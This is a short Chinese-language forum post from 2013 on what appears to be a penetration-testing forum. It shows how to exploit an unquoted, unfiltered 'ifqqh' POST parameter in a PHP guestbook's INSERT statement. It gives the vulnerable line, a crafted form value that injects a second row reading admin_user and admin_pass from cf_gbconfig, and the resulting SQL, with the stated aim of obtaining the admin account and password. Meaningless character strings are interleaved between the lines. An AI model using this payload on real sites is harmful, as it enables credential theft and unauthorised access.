中国网络渗透测试联盟
标题:
php留言本注入得帐号密码
[打印本页]
作者:
admin
时间:
2013-2-19 08:10
标题:
php留言本注入得帐号密码
留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
: J) \1 M0 ]8 m/ w) r
9 [2 O& s; p$ }
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
9 O/ @9 @1 A3 Y3 t5 P% H2 B( V
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
5 e4 A u" L p% X
6 e, u. m8 M% T% K
提交的时候把ifqqh的值改一下。变成
7 [1 B! O# ^! a7 R
& S' n1 V3 w/ G2 v/ _
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
& v" ^6 I0 N7 f+ o
" q7 h$ Y" I e
这样SQL插入语句就变了.
! C7 l4 P% F6 u! L' }1 j
! M. f _- T c! I+ r
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
! `5 t$ N- \) ~
1 W" U) Q4 m/ P2 @" n
构造了另外一句SQL。并且把帐号密码读出来。
4 v; m* \* L2 H+ C- j, v1 {
( c& E- |. {7 L" _, t- d+ u
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2